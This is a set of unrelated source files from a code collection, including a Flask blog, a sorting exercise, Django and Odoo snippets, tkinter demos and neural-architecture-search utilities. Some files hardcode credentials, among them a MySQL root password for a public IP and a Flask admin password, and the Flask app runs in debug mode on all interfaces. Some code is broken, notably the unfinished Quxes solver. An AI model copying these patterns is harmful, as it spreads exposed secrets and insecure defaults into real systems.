\"/?page=\" + str(page - 1)\n next = \"/?page=\" + str(page + 1)\n return render_template('index.html', posts=posts , befor=befor , next=next)\n\n\n@app.route(\"/upload\",methods = ['GET','POST'])\ndef upload():\n if 'user' in session and session['user'] == 'Nishit':\n if request.method == \"POST\":\n f = request.files[\"file\"]\n f.save(os.path.join(app.config[\"uploader\"],secure_filename(f.filename)))\n return \"uploaded successfully\"\n return \"create session first\"\n\n@app.route(\"/delet/\",methods = ['GET','POST'])\ndef delet(sno):\n if 'user' in session and session['user'] == 'Nishit':\n post = Blogs.query.filter_by(number=sno).first()\n db.session.delete(post)\n db.session.commit()\n return redirect('/dashboard')\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('user')\n return redirect(\"/\")\n\n\n@app.route(\"/dashboard\",methods=['GET','POST'])\ndef dashboard():\n\n if 'user' in session and session['user'] == 'Nishit':\n posts = Blogs.query.all()\n return render_template('dashboard.html',posts = posts)\n\n if request.method=='POST':\n username = request.form.get('uname')\n userpass = 
request.form.get('pass')\n        if username == 'Nishit' and userpass == '1142':\n            session['user'] = username\n            posts = Blogs.query.all()\n            return render_template('dashboard.html',posts = posts)\n\n\n    return render_template('login.html')\n\n@app.route(\"/post/<post_slug>\",methods=['GET'])\ndef post_route(post_slug):\n    post = Blogs.query.filter_by(slug=post_slug).first()\n    return render_template('post.html',post = post)\n\n@app.route(\"/about\")\ndef about():\n    return render_template('about.html')\n\n@app.route(\"/edit/<sno>\",methods = ['GET','POST'])\ndef edit(sno):\n    if 'user' in session and session['user'] == 'Nishit':\n        if (request.method == 'POST'):\n            title = request.form.get('title')\n            tline = request.form.get('tagline')\n            slug = request.form.get('slug')\n            content = request.form.get('content')\n            img_file = request.form.get('img_file')\n            by = request.form.get('by')\n            date = datetime.now()\n\n            if sno == '0':\n                post = Blogs(title=title,tag_line=tline,slug=slug,content=content,date=datetime.now(),img_file=img_file,by=by)\n                db.session.add(post)\n                db.session.commit()\n            else:\n                post = Blogs.query.filter_by(number=sno).first()\n                post.title = title\n                post.tagline = tline\n                post.slug = slug\n                post.content = content\n                post.img_file = img_file\n                post.by = by\n                db.session.commit()\n            return redirect('/dashboard')\n    post = Blogs.query.filter_by(number=sno).first()\n    return render_template('edit.html',post = post,sno=sno)\n\n\n\n\n\n@app.route(\"/contact\",methods = ['GET','POST'])\ndef contact():\n    if (request.method == 'POST'):\n        '''Add entry to the database'''\n        name = request.form.get('name')\n        phone = request.form.get('phone')\n        email = request.form.get('email')\n        message = request.form.get('message')\n\n\n        entry = Contents(name=name, phno=phone, date=datetime.now() ,email=email)\n        db.session.add(entry)\n        db.session.commit()\n        mail.send_message('new message from blog', sender = email, recipients = mailn.split(), body = message +\"\\n\" + phone)\n    return render_template('contact.html')\n\n\napp.run(host='0.0.0.0',port=port,debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"447448689","text":"class SortingRobot:\n    def __init__(self, l):\n        \"\"\"\n        SortingRobot takes a list and sorts it.\n        \"\"\"\n        self._list = l # The list the robot is tasked with sorting\n        self._item = None # The item the robot is holding\n        self._position = 0 # The list position the robot is at\n        self._light = \"OFF\" # The state of the robot's light\n        self._time = 0 # A time counter (stretch)\n\n    def can_move_right(self):\n        \"\"\"\n        Returns True if the robot can move right or False if it's\n        at the end of the list.\n        \"\"\"\n        return self._position < len(self._list) - 1\n\n    def can_move_left(self):\n        \"\"\"\n        Returns True if the robot can move left or False if it's\n        at the start of the list.\n        \"\"\"\n        return self._position > 0\n\n    def move_right(self):\n        \"\"\"\n        If the robot can move to the right, it moves to the right and\n        returns True. Otherwise, it stays in place and returns False.\n        This will increment the time counter by 1.\n        \"\"\"\n        self._time += 1\n        if self._position < len(self._list) - 1:\n            self._position += 1\n            return True\n        else:\n            return False\n\n    def move_left(self):\n        \"\"\"\n        If the robot can move to the left, it moves to the left and\n        
Otherwise, it stays in place and returns False.\n        This will increment the time counter by 1.\n        \"\"\"\n        self._time += 1\n        if self._position > 0:\n            self._position -= 1\n            return True\n        else:\n            return False\n\n    def swap_item(self):\n        \"\"\"\n        The robot swaps its currently held item with the list item in front\n        of it.\n        This will increment the time counter by 1.\n        \"\"\"\n        self._time += 1\n        # Swap the held item with the list item at the robot's position\n        self._item, self._list[self._position] = self._list[self._position], self._item\n\n    def compare_item(self):\n        \"\"\"\n        Compare the held item with the item in front of the robot:\n        If the held item's value is greater, return 1.\n        If the held item's value is less, return -1.\n        If the held item's value is equal, return 0.\n        If either item is None, return None.\n        \"\"\"\n        if self._item is None or self._list[self._position] is None:\n            return None\n        elif self._item > self._list[self._position]:\n            return 1\n        elif self._item < self._list[self._position]:\n            return -1\n        else:\n            return 0\n\n    def set_light_on(self):\n        \"\"\"\n        Turn on the robot's light\n        \"\"\"\n        self._light = \"ON\"\n    def set_light_off(self):\n        \"\"\"\n        Turn off the robot's light\n        \"\"\"\n        self._light = \"OFF\"\n    def light_is_on(self):\n        \"\"\"\n        Returns True if the robot's light is on and False otherwise.\n        \"\"\"\n        return self._light == \"ON\"\n\n    '''\n    My 2 cents for this before I start working... \n    -the light function is a boolean determining whether swaps/changes occurred \n    -using while loop/ way to \"break out\" with light/boolean (thanks Brady)\n    -once in loop, we need to move right to start comparing the items.. \n    so we'll need to check if we can move right first and if we can, then move, and go into the next step \n    of comparing the items\n    - we'll need to compare the items, the one currently held and the one in front of the robot\n    - if the one being held is larger, we'll have to swap them and then go back and put the smaller one\n    we just picked up down, and then move forward again\n    -if the one being held is smaller, then we just move back or to the left and put it back and then continue moving forward/right.\n    - we continue this until we can no longer move right/end of list\n    - let's see if this works... \n    ''' \n    def sort(self):\n        \"\"\"\n        Sort the robot's list.\n        \"\"\"\n        self.set_light_on()\n        # start\n        while self.light_is_on():\n            self.set_light_off()\n            # checking to see if it can move right\n            while self.can_move_right():\n                # pick up item and then move right\n                self.swap_item()\n                self.move_right()\n                # now we need to go and compare the items\n                # if item held is larger than one in front\n                if self.compare_item() == 1:\n                    self.swap_item()\n                    self.move_left()\n                    self.swap_item()\n                    self.move_right()\n                    self.set_light_on()\n                # if item held is smaller than or the same as the one in front\n                else:\n                    self.move_left()\n                    self.swap_item()\n                    self.move_right()\n            # when we hit the end of the list and can't move right, we go back and start over with comparing\n            # while self.can_move_right() is False: ## 🤬🤬🤬🤬\n            # instead of checking if moving right is false- that will only take you one space back\n            # and then can_move_right will go back to true... make it can_move_left until that turns false\n            # and start our checks again... 
yikes\n            while self.can_move_left():\n                self.move_left()\n\n        # if nothing is swapped, the light stays off and we know everything is sorted\n\n        \n        \n        \n\n        # Fill this out\n        #pass\n\n\n\nif __name__ == \"__main__\":\n    # Test out your implementation from the command line\n    # with `python robot_sort.py`\n\n    l = [15, 41, 58, 49, 26, 4, 28, 8, 61, 60, 65, 21, 78, 14, 35, 90, 54, 5, 0, 87, 82, 96, 43, 92, 62, 97, 69, 94, 99, 93, 76, 47, 2, 88, 51, 40, 95, 6, 23, 81, 30, 19, 25, 91, 18, 68, 71, 9, 66, 1, 45, 33, 3, 72, 16, 85, 27, 59, 64, 39, 32, 24, 38, 84, 44, 80, 11, 73, 42, 20, 10, 29, 22, 98, 17, 48, 52, 67, 53, 74, 77, 37, 63, 31, 7, 75, 36, 89, 70, 34, 79, 83, 13, 57, 86, 12, 56, 50, 55, 46]\n\n    robot = SortingRobot(l)\n\n    robot.sort()\n    print(robot._list)","sub_path":"robot_sort/robot_sort.py","file_name":"robot_sort.py","file_ext":"py","file_size_in_byte":6192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"651652588","text":"from django import forms\nimport speech_recognition, ffmpy, os\n\n\nclass FileUploadForm(forms.Form):\n    file = forms.FileField()\n\n\nclass stt:\n    @staticmethod\n    def speechTOrecognition(input_file):\n        \n        ff = ffmpy.FFmpeg(\n            inputs = { input_file : None },\n            outputs = {'output.wav' : None }\n        )\n        ff.run()\n\n        input_file = 'output.wav'\n\n        r = speech_recognition.Recognizer()\n        with speech_recognition.AudioFile(input_file) as source:\n            audio = r.record(source)\n        sttResult = r.recognize_google(audio,language='zh-tw')\n        os.remove('output.wav')\n        return sttResult\n    \n\n\n","sub_path":"mysite/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"247700831","text":"import mysql.connector\n# from mysql.connector import *\ncon = mysql.connector.connect(host='18.219.99.141', database='db1', user='root', password='India12345')\n#con = mysql.connector.connect(host='localhost', database='db1', user='root', password='mithalal')\nc = con.cursor()\n\n\ndef create_table():\n    c.execute(\"create table nirma_employee(empid varchar(10), empname varchar(20), salary varchar(8))\")\n\n\ndef insert_table():\n    c.execute(\"insert into nirma_employee values('1001', 'raj', '20000')\")\n    c.execute(\"insert into nirma_employee values('1002', 'swathi', '25000')\")\n    c.execute(\"insert into nirma_employee values('1003', 'akash', '12000')\")\n    c.execute(\"insert into nirma_employee values('1004', 'simran', '22000')\")\n    c.execute(\"insert into nirma_employee values('1005', 'rahul', '200000')\")\n    con.commit()\n\n\ndef select_table():\n    c.execute('select * from nirma_employee')\n    data = c.fetchall()\n    for row in data:\n        print(row)\n\n\ndef update_table():\n    c.execute(\"update nirma_employee set salary='15000' where empid='1003'\")\n    con.commit()\n\n\ndef delete_table():\n    c.execute(\"delete from nirma_employee where empid='1005'\")\n    con.commit()\n\n\ncreate_table()\ninsert_table()\nupdate_table()\ndelete_table()\nselect_table()\nc.close()\ncon.close()\n","sub_path":"employee1.py","file_name":"employee1.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"535989197","text":"class UserBook:\n    \"\"\"\n    An object to store the book data and the user's\n    rating, etc. of the book\n    \"\"\"\n\n    def __init__(self):\n        self.book = None # The book object\n        self.goodreads_id = \"No gid\"\n\n        self.rating = \"No rating\"\n        self.readcount = 0\n\n        
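# acquisition and ownership details below; placeholder values until the crawler fills them in\n        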
self.date_added = \"No added date\"\n self.date_purchased = \"No purchase date\"\n self.owned = \"No owned info\"\n self.purchase_location = None\n self.condition = None\n self.format = None\n self.review = None\n self.recomender = None\n self.notes = None\n self.comments = None\n self.votes = None\n self.date_pub_edition = None\n self.link = None\n","sub_path":"crawler/userbook.py","file_name":"userbook.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"508586918","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home),\n path('camisa/', views.camisa_list),\n path('camisa//', views.camisa_show),\n path('casual/', views.casual_list),\n path('casual//', views.casual_show),\n path('camisa/form/', views.camisa_form),\n path('casual/form/', views.casual_form),\n path('camisa//edit/', views.camisa_edit),\n path('casual//edit/', views.casual_edit)\n \n]\n","sub_path":"departamento/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"40632770","text":"'''\nThis problem was asked by Facebook.\n\nOn a mysterious island there are creatures known as \nQuxes which come in three colors: red, green, and blue. \nOne power of the Qux is that if two of them are standing \nnext to each other, they can transform into a \nsingle creature of the third color.\n\nGiven N Quxes standing in a line, determine the smallest \nnumber of them remaining after any possible sequence of such transformations.\n\nFor example, given the input ['R', 'G', 'B', 'G', 'B'], \nit is possible to end up with a single Qux through the following steps:\n\n\n Arrangement | Change\n----------------------------------------\n['R', 'G', 'B', 'G', 'B'] | (R, G) -> B\n['B', 'B', 'G', 'B'] | (B, G) -> R\n['B', 'R', 'B'] | (R, B) -> G\n['B', 'G'] | (B, G) -> R\n['R'] |\n'''\n\n\n# Recursive Approach -> DFS\n\nclass Node:\n def __init__(self,v,n:list=None):\n self.v = v\n self.neighs = n\n\ndef expand_branches(n:Node): #, state:list):\n state = n.v\n for i in range(len(state)-2):\n if state[i] != state[i+1]:\n n.neighs.append(Node(i))\n return\n\ndef get_min_sequence_helper(root, visited):\n expand_branches(root.v)\n # Base Case\n if len(root.n) <= 1:\n pass\n\n # Recursive Case\n for neigh in root.neighs:\n if neigh not in visited:\n visited.add(neigh)\n get_min_sequence_helper(neigh, visited)\n\ndef get_min_sequence(arr:list):\n root = Node(arr)\n visited = set()\n results = list()\n\nget_min_sequence\n","sub_path":"DailyCodingProblem/290_Quxes.py","file_name":"290_Quxes.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"649766510","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# Odoo Proprietary License v1.0\n#\n# This software and associated files (the \"Software\") may only be used (executed,\n# modified, executed after modifications) if you have purchased a valid license\n# from the authors, typically via Odoo Apps, or if you have received a written\n# agreement from the authors of the Software (see the COPYRIGHT file).\n#\n# You may develop Odoo modules that use the Software as a library (typically\n# by depending on it, importing it and using its resources), but without copying\n# any source code or material from the Software. 
You may distribute those\n# modules under the license of your choice, provided that this license is\n# compatible with the terms of the Odoo Proprietary License (For example:\n# LGPL, MIT, or proprietary licenses similar to this one).\n#\n# It is forbidden to publish, distribute, sublicense, or sell copies of the Software\n# or modified copies of the Software.\n#\n# The above copyright notice and this permission notice must be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n#\n# © 2018 Bernard K Too\n\"\"\"\n\nfrom odoo import models, api, _\n\n\nclass SendRAByEmail(models.Model):\n    _inherit = [\"account.payment\", \"mail.thread\"]\n    _name = \"account.payment\"\n\n    @api.multi\n    def SendByEmail(self):\n        \"\"\"This function opens a window to compose an email, with the\n        remittance email template.\"\"\"\n        self.ensure_one()\n        template_id = self.env.ref(\n            'remittance_advice_report.email_template_send_remittance').id\n        compose_form_id = self.env.ref(\n            'mail.email_compose_message_wizard_form').id\n        ctx = dict(\n            default_model='account.payment',\n            default_res_id=self.id,\n            default_use_template=bool(template_id),\n            default_template_id=template_id,\n            default_composition_mode='comment',\n        )\n\n        return {\n            'name': _('Compose Email'),\n            'type': 'ir.actions.act_window',\n            'view_type': 'form',\n            'view_mode': 'form',\n            'res_model': 'mail.compose.message',\n            'views': [(compose_form_id, 'form')],\n            'view_id': compose_form_id,\n            'target': 'new',\n            'context': ctx,\n        }\n","sub_path":"remittance_advice_report-V12/models/remittance.py","file_name":"remittance.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"149691595","text":"import logging\nlogger = logging.getLogger(__name__)\n\nclass ThumbnailAdminMixin(object):\n    \"\"\"\n    Shortcut for displaying a thumbnail in a changelist (or inline).\n\n    Requires easy-thumbnails.\n\n    Specify ImageField name in `thumbnail_field`, and optionally override\n    `thumbnail_options` for customisation such as sizing, cropping, etc.\n    Plays nicely with list_display_links if you want a clickable thumbnail.\n\n    Add 'thumbnail' to `list_display` or `readonly_fields`, etc to display.\n    \"\"\"\n\n    thumbnail_field = None\n    thumbnail_options = {'size': (100,100)}\n\n    def get_thumbnail_source(self, obj):\n        if self.thumbnail_field:\n            try:\n                return getattr(obj, self.thumbnail_field)\n            except AttributeError:\n                logger.error(\n                    'ThumbnailAdminMixin.thumbnail_field getattr failed')\n        else:\n            logger.warning('ThumbnailAdminMixin.thumbnail_field unspecified')\n\n    def thumbnail(self, obj):\n        source = self.get_thumbnail_source(obj)\n        if source:\n            from easy_thumbnails.files import get_thumbnailer\n            thumbnailer = get_thumbnailer(source)\n            try:\n                thumbnail = thumbnailer.get_thumbnail(self.thumbnail_options)\n            except Exception:\n                return ''\n            return '<img src=\"{}\" />'.format(thumbnail.url)\n        else:\n            return ''\n    thumbnail.allow_tags = 
True\n","sub_path":"generic/admin/mixins/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68184730","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title (\"Nado GUI\")\r\nbtn1 = Button(root, text=\"버튼1\")\r\nbtn1.pack()\r\n\r\n\r\nbtn2 = Button(root, padx=5, pady=10, text=\"버튼22222222222222222222\")\r\nbtn2.pack()\r\n\r\n\r\nbtn3 = Button(root, padx=10, pady=5, text=\"버튼3\")\r\nbtn3.pack()\r\n\r\n\r\nbtn4 = Button(root, width=20, height=2, text=\"버튼4444444444444444444444444\")\r\nbtn4.pack()\r\n\r\n\r\nbtn5 = Button(root, fg=\"red\", bg=\"yellow\", width=20, height=2, text=\"버튼4444444444444444444444444\")\r\nbtn5.pack()\r\n\r\nphoto = PhotoImage(file=\"D:\\Program Files\\PythonTutorial\\mysite\\gui_basic\\img.png\")\r\nbtn6 = Button(root, image=photo)\r\nbtn6.pack()\r\n \r\n\r\ndef btncmd():\r\n print(\"버튼을 클릭 했어요\")\r\n\r\nbtn7 = Button(root, text=\"동작하는 버튼\", command=btncmd)\r\nbtn7.pack()\r\n\r\n\r\nroot.mainloop()","sub_path":"gui_basic/2_button.py","file_name":"2_button.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"386480801","text":"\n\n#calss header\nclass _SCURRY():\n\tdef __init__(self,): \n\t\tself.name = \"SCURRY\"\n\t\tself.definitions = [u'to move quickly, with small, short steps: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_scurry.py","file_name":"_scurry.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215218816","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\nimport logging\nimport os\nimport shutil\nimport time\nfrom datetime import timedelta\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.distributed as dist\n\nfrom genotypes import PRIMITIVES\nfrom operations import *\n\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\n\n\nclass AvgrageMeter(object):\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.avg = 0\n self.sum = 0\n self.cnt = 0\n\n def update(self, val, n=1):\n self.sum += val * n\n self.cnt += n\n self.avg = self.sum / self.cnt\n\n\nclass ExpMovingAvgrageMeter(object):\n\n def __init__(self, momentum=0.9):\n self.momentum = momentum\n self.reset()\n\n def reset(self):\n self.avg = 0\n\n def update(self, val):\n self.avg = (1. 
- self.momentum) * self.avg + self.momentum * val\n\n\ndef accuracy(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0/batch_size))\n return res\n\n\nclass Cutout(object):\n def __init__(self, length):\n self.length = length\n\n def __call__(self, img):\n h, w = img.size(1), img.size(2)\n mask = np.ones((h, w), np.float32)\n y = np.random.randint(h)\n x = np.random.randint(w)\n\n y1 = np.clip(y - self.length // 2, 0, h)\n y2 = np.clip(y + self.length // 2, 0, h)\n x1 = np.clip(x - self.length // 2, 0, w)\n x2 = np.clip(x + self.length // 2, 0, w)\n\n mask[y1: y2, x1: x2] = 0.\n mask = torch.from_numpy(mask)\n mask = mask.expand_as(img)\n img *= mask\n return img\n\n\ndef count_parameters_in_M(model):\n return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if \"auxiliary\" not in name)/1e6\n\n\ndef save_checkpoint(state, is_best, save):\n filename = os.path.join(save, 'checkpoint.pth.tar')\n torch.save(state, filename)\n if is_best:\n best_filename = os.path.join(save, 'model_best.pth.tar')\n shutil.copyfile(filename, best_filename)\n\n\ndef save(model, model_path):\n torch.save(model.state_dict(), model_path)\n\n\ndef load(model, model_path):\n model.load_state_dict(torch.load(model_path))\n\n\ndef drop_path(x, drop_prob):\n if drop_prob > 0.:\n keep_prob = 1.-drop_prob\n mask = torch.cuda.FloatTensor(\n x.size(0), 1, 1, 1).bernoulli_(keep_prob)\n x = x / keep_prob\n x = x * mask\n return x\n\n\ndef create_exp_dir(path, scripts_to_save=None):\n if not os.path.exists(path):\n os.makedirs(path, exist_ok=True)\n print('Experiment dir : {}'.format(path))\n\n if scripts_to_save is not None:\n if not os.path.exists(os.path.join(path, 'scripts')):\n os.mkdir(os.path.join(path, 'scripts'))\n for script in scripts_to_save:\n dst_file = os.path.join(path, 'scripts', os.path.basename(script))\n shutil.copyfile(script, dst_file)\n\n\nclass ClassErrorMeter(object):\n def __init__(self):\n super(ClassErrorMeter, self).__init__()\n self.class_counter = {}\n\n def add(self, output, target):\n _, pred = output.max(dim=1)\n\n target = list(target.cpu().numpy())\n pred = list(pred.cpu().numpy())\n\n for t, p in zip(target, pred):\n if t not in self.class_counter:\n self.class_counter[t] = {'num': 0, 'correct': 0}\n self.class_counter[t]['num'] += 1\n if t == p:\n self.class_counter[t]['correct'] += 1\n\n def value(self, method):\n print('Error type: ', method)\n if method == 'per_class':\n mean_accuracy = 0\n for t in self.class_counter:\n class_accuracy = float(self.class_counter[t]['correct']) / \\\n self.class_counter[t]['num']\n mean_accuracy += class_accuracy\n mean_accuracy /= len(self.class_counter)\n output = mean_accuracy * 100\n elif method == 'overall':\n num_total, num_correct = 0, 0\n for t in self.class_counter:\n num_total += self.class_counter[t]['num']\n num_correct += self.class_counter[t]['correct']\n output = float(num_correct) / num_total * 100\n return [100 - output]\n\n\ndef sample_gumbel(shape, eps=1e-20):\n U = torch.Tensor(shape).uniform_(0, 1).cuda()\n sample = -(torch.log(-torch.log(U + eps) + eps))\n return sample\n\n\ndef gumbel_softmax_sample_original(logits, temperature):\n y = logits + sample_gumbel(logits.size())\n return F.softmax(y / temperature, dim=-1)\n\n\ndef logsumexp(logits, dim):\n mx = 
torch.max(logits, dim, keepdim=True)[0]\n    return torch.log(torch.sum(torch.exp(logits - mx), dim=dim, keepdim=True)) + mx\n\n\ndef gumbel_softmax_sample_improved(logits, temperature):\n    def gsm(rho, q):\n        return F.softmax((-torch.log(rho + 1e-20) + torch.log(q + 1e-20)) / temperature, dim=-1)\n    q = F.softmax(logits, dim=-1)\n    U = torch.Tensor(q.size()).uniform_(0, 1).cuda()\n    U = torch.clamp(U, 1e-15, 1. - 1e-15)\n    log_U = torch.log(U)\n    rho = log_U / (torch.sum(log_U, dim=-1, keepdim=True))\n    return gsm(rho.detach() - q + q.detach(), q.detach())\n\n\ndef gumbel_softmax_sample_rebar(logits, temperature):\n    logits = logits - torch.logsumexp(logits, dim=-1, keepdim=True)\n    q = F.softmax(logits, dim=-1)\n    u = torch.Tensor(q.size()).uniform_(0, 1).cuda()\n    u = torch.clamp(u, 1e-3, 1.-1e-3)\n\n    # draw gsm samples\n    z = logits - torch.log(- torch.log(u))\n    gsm = F.softmax(z / temperature, dim=-1)\n\n    # compute the correction term for conditional samples\n    # see REBAR: https://arxiv.org/pdf/1703.07370.pdf\n    k = torch.argmax(z, dim=-1, keepdim=True)\n    # get v from u\n    u_k = u.gather(-1, k)\n    q_k = q.gather(-1, k)\n    # This can cause numerical problems, better to work with log(v_k) = log(u_k) / q_k\n    # v_k = torch.pow(u_k, 1. / q_k)\n    # v.scatter_(-1, k, v_k)\n    log_vk = torch.log(u_k) / q_k\n    log_v = torch.log(u) - q * log_vk\n\n    # assume k and v are constant\n    k = k.detach()\n    log_vk = log_vk.detach()\n    log_v = log_v.detach()\n    g_hat = - torch.log(-log_v/q - log_vk)\n    g_hat = g_hat.scatter(-1, k, -torch.log(- log_vk))  # scatter is out-of-place, so keep the result\n    gsm1 = F.softmax(g_hat / temperature, dim=-1)\n\n    return gsm - gsm1 + gsm1.detach()\n\n\ndef gumbel_softmax_sample(logits, temperature, gsm_type='improved'):\n    if gsm_type == 'improved':\n        return gumbel_softmax_sample_improved(logits, temperature)\n    elif gsm_type == 'original':\n        return gumbel_softmax_sample_original(logits, temperature)\n    elif gsm_type == 'rebar':\n        return gumbel_softmax_sample_rebar(logits, temperature)\n\n\ndef plot_alphas(alpha, display=True, title='', savename=''):\n    fig, ax = plt.subplots()\n    fig.set_figheight(10)\n    fig.set_figwidth(7)\n\n    alpha = alpha.data.cpu().numpy()\n\n    num_edges = alpha.shape[0]\n    ops = PRIMITIVES\n\n    ax.xaxis.tick_top()\n    plt.imshow(alpha, vmin=0, vmax=1)\n    plt.xticks(range(len(ops)), ops)\n    plt.xticks(rotation=30)\n    plt.yticks(range(num_edges), range(1, num_edges+1))\n    for i in range(num_edges):\n        for j in range(len(ops)):\n            val = alpha[i][j]\n            val = '%.4f' % (val)\n            ax.text(j, i, val, va='center',\n                    ha='center', color='white', fontsize=8)\n\n    plt.colorbar()\n    plt.tight_layout()\n    fig.suptitle(title, fontsize=16, fontweight='bold')\n\n    if savename:\n        plt.savefig(savename)\n    if display:\n        plt.show()\n    else:\n        return fig\n\n\ndef plot_alphas_paired_input(alpha, display=True, title='', savename=''):\n    fig, ax = plt.subplots(1, 2)\n    fig.set_figheight(6)\n    fig.set_figwidth(13)\n\n    for idx, k in enumerate(sorted(alpha.keys())):\n        prob = [F.softmax(a, dim=-1) for a in alpha[k]]\n        if k == 'input':\n            selector = torch.cat(prob, 1)\n        elif k == 'combiner':\n            selector = torch.cat(prob, 0).view(len(alpha[k]), -1)\n        else:\n            selector = torch.cat(prob, 0)\n\n        selector = selector.data.cpu().numpy()\n        im = ax[idx].imshow(selector, vmin=0, vmax=1)\n        # ax[idx].set_title(k)\n        ax[idx].set_xlabel(k)\n        xticks = get_xticks(alpha[k], k)\n        plt.sca(ax[idx])\n        ax[idx].xaxis.tick_top()\n        plt.xticks(range(len(xticks)), xticks)\n        plt.xticks(ha='left', rotation=30, fontsize=8)\n        plt.yticks(range(selector.shape[0]), range(1, selector.shape[0] + 1))\n\n    cbaxes = fig.add_axes([0.05, 
0.2, 0.01, 0.6])\n fig.colorbar(im, cax=cbaxes)\n cbaxes.yaxis.set_ticks_position('left')\n\n if savename:\n plt.savefig(savename)\n if display:\n plt.show()\n else:\n return fig\n\n\ndef get_xticks(alpha, key):\n if key == 'input':\n xticks = []\n for i in range(len(alpha)):\n for j in range(i+2):\n xticks.append(j)\n elif key == 'op':\n xticks = PRIMITIVES\n elif key == 'activation':\n xticks = ACTIVATIONS.keys()\n elif key == 'combiner':\n xticks = COMBINERS.keys()\n else:\n raise NotImplementedError\n\n return xticks\n\n\ndef generate_paired_indices(step):\n indices = []\n for i in range(step + 2):\n indices.append((i, i))\n\n for i in range(step + 2):\n for j in range(i + 1, step + 2):\n indices.append((i, j))\n\n return indices\n\n\nclass Logger(object):\n def __init__(self, rank, save):\n self.rank = rank\n if self.rank == 0:\n log_format = '%(asctime)s %(message)s'\n logging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\n fh = logging.FileHandler(os.path.join(save, 'log.txt'))\n fh.setFormatter(logging.Formatter(log_format))\n logging.getLogger().addHandler(fh)\n self.start_time = time.time()\n\n def info(self, string, *args):\n if self.rank == 0:\n elapsed_time = time.time() - self.start_time\n elapsed_time = time.strftime(\n '(Elapsed: %H:%M:%S) ', time.gmtime(elapsed_time))\n if isinstance(string, str):\n string = elapsed_time + string\n else:\n logging.info(elapsed_time)\n logging.info(string, *args)\n\n\nclass Writer(object):\n def __init__(self, rank, save):\n self.rank = rank\n if self.rank == 0:\n try:\n self.writer = SummaryWriter(log_dir=save, flush_secs=20)\n except:\n self.writer = SummaryWriter(logdir=save, flush_secs=20)\n\n def add_scalar(self, *args, **kwargs):\n if self.rank == 0:\n self.writer.add_scalar(*args, **kwargs)\n\n def add_figure(self, *args, **kwargs):\n if self.rank == 0:\n self.writer.add_figure(*args, **kwargs)\n\n def flush(self):\n if self.rank == 0:\n self.writer.flush()\n\n\ndef reduce_tensor(tensor, world_size):\n rt = tensor.clone()\n dist.all_reduce(rt, op=dist.ReduceOp.SUM)\n rt /= world_size\n return rt\n\n\ndef get_memory_usage(device=None):\n try:\n memory_cached = torch.cuda.max_memory_cached(device) * 1e-9\n memory_alloc = torch.cuda.max_memory_allocated(device) * 1e-9\n torch.cuda.reset_max_memory_allocated(device)\n torch.cuda.reset_max_memory_cached(device)\n except Exception:\n memory_cached, memory_alloc = 0., 0.\n return memory_cached, memory_alloc\n\n\ndef is_parametric(primitive):\n if primitive in {'none', 'skip_connect', 'max_pool_3x3', 'avg_pool_3x3'}:\n return False\n elif primitive in {'sep_conv_3x3', 'sep_conv_5x5', 'sep_conv_7x7', 'dil_conv_3x3', 'dil_conv_5x5'}:\n return True\n else:\n raise 